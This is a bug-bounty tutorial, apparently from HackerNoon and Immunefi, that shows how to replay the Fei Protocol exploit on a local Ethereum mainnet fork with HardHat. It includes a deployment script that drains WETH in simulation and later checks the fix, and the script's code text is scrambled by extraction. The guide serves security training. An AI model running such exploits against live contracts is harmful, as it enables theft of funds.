Bug bounty programs are open invitations to security researchers to discover and disclose potentially vulnerabilities in projects’ smart contracts and applications, thereby protecting projects and their users. For their good work, security researchers receive a reward based on the severity of the vulnerability, as determined by the project affected. Launched on December 9, 2020, focused on blockchain and smart contract security, provides bug bounty hosting, consultation, bug triaging, and program management services to blockchain and smart contract projects. Immunefi This guide, written by whitehat for , will help you set up a local environment and reproduce the Fei Protocol exploit, so that you can get up to speed on setting up a proper tooling environment for finding bugs and claiming the world’s largest bounties at Immunefi. Lucash-dev Immunefi Join our whitehat community and get notified when new bounties launch on the platform. Learn new info! or join our Get started here Discord! By the end of this guide you will have: Created a simple HardHat project Compiled PoC smart contract code Created a local fork of the Ethereum mainnet Run a script that deploys and executes the PoC contract And that’s supposed to teach you: How to test your own exploits against the mainnet That hacking Ethereum contracts isn’t that complicated Assumptions You understand the basics of distributed ledger (aka blockchain) You understand the basics of Ethereum smart contracts and Solidity You’ve read and understood in general the exploit described in the Fei postmortem (linked above) You have some basic skills in JavaScript and node.js (not a lot needed) You have a Unix OS (Linux/MacOS) or a Unix compatible shell (like git-bash in Windows). The remainder of this guide will assume you’re using Ubuntu, though it’s unlikely commands will be much different in other systems Linux Dependencies Before we get started let’s ensure you have the following dependencies installed on your system: node.js npm yarn Installing them in Ubuntu is simple: sudo apt update
sudo apt install nodejs npm
sudo npm install --global yarn If you have a different system or the above commands don’t work, please refer to the project documentations. HardHat project HardHat is a framework for the development, test, and deployment of Ethereum smart contracts. It will make our life easier by making it easy to run a local fork Ethereum network, so that we don’t perform tests against the actual mainnet (expensive and dangerous!). It also provides libraries and utilities to automate scripts to perform all of the tasks for our tests. To create an empty HardHat project: mkdir fei-poc
cd fei-poc
yarn add hardhat
npx hardhat init If HardHat prompts you for answers, you should select “create a sample project” and then “yes” to all other questions. You’ll observe that a bunch of files have been created, and dependencies added. yarn You should see a file named that looks like this (some content omitted): hardhat.config.js ( );
task( , , () => {
    ...
}); .exports = { : ,
}; require "@nomiclabs/hardhat-waffle" "accounts" "..." async module solidity "0.7.3" You should also see a file and . contracts/Greeter.sol scripts/sample-scripts.js Those are a sample smart contract and a sample script. To check that your setup is working you can run: npx hardhat run scripts/sample-script.js You should see a message in the console like Greeter deployed to: 0x... What the command above just did: Compiled the sample contract Started a local Ethereum network node (empty) Deployed the sample contract to it If you see any error messages at this point, there’s likely something wrong with your installation, and you should troubleshoot it. Compiling the PoC Code. Copy Exploit Code Now that we have a HardHat project, let’s copy the PoC exploit code to it, so that we can compile and deploy locally. First, grab the two files for the exploit and copy them to the contractsdirectory in your project. Allocator.sol Exploit.sol Now, compiling it should be as simple as running: npx hardhat compile Except this won’t work yet! If you try the command above, all you’ll see is an error message about an imported file not being found. The reason is we’re missing the code for the interfaces of the contracts the PoC code interacts with. Grabbing Code for Interfaces Our life would be much easier if the hacker who created the PoC had provided a full project we can just build locally, but they haven’t. When you’re hacking deployed contracts, this will often be the case. For the Fei PoC most of the interfaces can be easily found in the , but that’s not always going to be the case. You can definitely search GitHub, and often find what you’re looking for, but sometimes mixing code written in different versions of Solidity might be problematic and require manual fixing. Fei codebase in GitHub As a last resort, you can always look for the contract code in Etherscan, if you know the contract address. Sometimes it will have the code for the interface ready. Other times, you might at least find the ABI. One easy trick to get interfaces, even when you don’t have the source code for the contracts, is to find the ABI for the contract in and then use a . Though this trick is nice, it don’t always work. For example, the tool has trouble with complex types ( ). Etherscan tool to create the Solidity interface code for it struct For this PoC contract, though, you should be able to easily find all interfaces between the Fei codebase and the following resources: https://github.com/Uniswap/uniswap-v2-core/tree/master/contracts https://github.com/Uniswap/uniswap-v2-periphery/tree/master/contracts https://github.com/aave/flashloan-box/tree/master/contracts/aave Add each to its own “.sol” file, matching the names of the files in the “import” statements in the PoC code. Once you do that, compiling should work: npx hardhat compile Forking the Mainnet For testing the PoC code, we are going to create a local fork of the Ethereum mainnet. That means that the initial state of all contracts already deployed are coming from the blockchain, but all changes are only made locally. real That is a very powerful tool that HardHat (well, actually ganache behind the scenes) for testing. We can mimic what would happen in a real attack, without affecting any real mainnet state and without spending huge money on transaction fees. exactly It will also allow us to simulate the blockchain at any given point in the past, as we can choose the block number to start the fork, and let us impersonate any account for testing (simulating attacks by privileged users for example, or by whales). To do that, you’ll need to sign up for an account with Alchemy (there are other ways to do that without their services, but not practical). Sign up for Alchemy API Before forking the blockchain you’ll need to sign up for using the Alchemy API at: https://auth.alchemyapi.io/signup The free account is probably enough for all your hacking needs. Once you finish signing up, you’ll need to add an “app” in your dashboard. You can call it “test”. After creating an app you should be able to find the API URL, with your secret key. It should look like: https: //eth-mainnet.alchemyapi.io/v2/k1asdfa2fasdfa-asdf_asdf Take note of the URL and keep it secret. You’ll need it to configure your local fork. Configure and Test Local Fork Now that you have your Alchemy API URL, add configuration to fork the mainnet to your (in your project root directory). hardhat.config.js .exports = { : , : { : { : { url: }
    }
  }, : } module defaultNetwork 'hardhat' networks hardhat forking // Replace with your actual API URL "https://eth-mainnet.alchemyapi.io/v2/k1asdfa2fasdfa-asdf_asdf" solidity "0.7.3" You can run the sample script in your local fork. It shouldn’t make any difference for now, as the sample script doesn’t interact with any mainnet contracts, but it’s a good way to test your setup. npx hardhat run scripts/sample-script.js Create and Run the Test Script To test the Fei attack, you can use the script below: hre = ( ); { hre.network.provider.request({ : , : [{ : { jsonRpcUrl: , : }
    }]
  }) WETH = hre.ethers.getContractAt( , ); Exploit = hre.ethers.getContractFactory( ); exploit = Exploit.deploy(); .log( , exploit.address); balance0 = WETH.balanceOf(exploit.address); .log( ,balance0/ , ); .log( ); d = b = exploit.start(d, b); balance1 = WETH.balanceOf(exploit.address); .log( ); .log( ,balance1/ , );
}
main()
  .then( process.exit( ))
  .catch( { .error(error);
    process.exit( );
  }); const require "hardhat" async ( ) function main // We reset the local chain to a fork of mainnet // so that the state is always pristine. await method "hardhat_reset" params forking // Replace with your actual API URL "https://eth-mainnet.alchemyapi.io/v2/asdfasdfasdfasdf" //,blockNumbeR: 12500000 // after fix blockNumber 12350000 // before fix // We'll use this contract to check the WETH balance of the // PoC contract. const await "IERC20" '0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2' // Deploy the PoC contract. const await "Exploit" const await console "Exploit deployed to:" // Let's run the exploit PoC! const await console "Balance before exploit" 1e18 "ETH" console "starting exploit" // I had a bit of trouble finding the optimal values using the // the Python script, values didn't seem to work. // Found these parameters by trial and error. "207569000000000000000000" "092430000000000000000000" await const await console "If the balance is positive the exploit worked!" console "Balance after exploit" 1e18 "ETH" => () 0 => error console 1 If you follow the comments, it should be clear what each command does. The most important detail to notice here is that we’ll use a fork of the mainnet at a specific block . before the vulnerability was fixed Save it as and run with the command: fei.js npx hardhat run scripts/fei.js You should see several debug messages and something like this in the end of the output: If the balance is positive the exploit worked!
Balance after exploit ETH 9635.065665081976 If the balance is displayed as above, congratulations! You just simulated stealing a few million dollars from Fei Protocol smart contracts. The ability to go back in time and replay an attack is definitely a great help for learning hacking! Testing Fix to the Bug We’re not 100% done yet. What if someone actually executed this attack in the real world? We can test that the issue has been fixed by trying to replay the attack, but using a fork of the mainnet at a block . after the vulnerability was fixed Change the lines that reset the network to look like: hre.network.provider.request({ : , : [{ : { jsonRpcUrl: blockNumbeR: }
    }]
  }) // We reset the local chain to a fork of mainnet // so that the state is always pristine. await method "hardhat_reset" params forking // Replace with your actual API URL "https://eth-mainnet.alchemyapi.io/v2/asdfasdfasdfasdf" 12500000 // after fix //,blockNumber: 12350000 // before fix Run the script again. It should fail now, proving the attack doesn’t work anymore, and that the fix deployed indeed removed the vulnerability. You could further test the deployed contracts for a regression of the issue by changing the block number to a number closest to the present blockchain height (number of the last block). Conclusion By following this guide, you should’ve been able to reproduce the Fei vulnerability in your local fork of the Ethereum mainnet. Now, you should try modifying the test script and the PoC contract, pointing to other mainnet contracts, perhaps in other projects, and observing the results. My recommendation for learning hacking is to start from the target code base, and when you find something that looks suspicious, try to interact with the contract using the local fork. Hope you found this guide useful! Happy hacking!

Ethereum

Uniswap

Aave

Chain

BUNCH

fees

Target

Join Immunefi!

Nominated for 2022 - HackerNoon Contributor of the Year - Smart Contracts

Too Long; Didn't Read

Build Your Bug Bounty: Smart Contract Pentesting Overview

Build Your Bug Bounty: Smart Contract Pentesting Overview

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

#10 Rules of Bug Bounty

A Guide To Web Security Testing: Part 1 - Mapping Contents

A Guide To Web Security Testing: Part 2 - Analyze the Web Application

Bounty0x Is Here To Change The Way People Make Money With Cryptos

Bug Bounties and Penetration Testing Will NOT Be Made Obsolete Anytime Soon.

Bug Bounties are undervalued, mispricing led to hacker stealing $40 million from Binance

#10 Rules of Bug Bounty

A Guide To Web Security Testing: Part 1 - Mapping Contents

A Guide To Web Security Testing: Part 2 - Analyze the Web Application

Bounty0x Is Here To Change The Way People Make Money With Cryptos

Bug Bounties and Penetration Testing Will NOT Be Made Obsolete Anytime Soon.

Bug Bounties are undervalued, mispricing led to hacker stealing $40 million from Binance

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps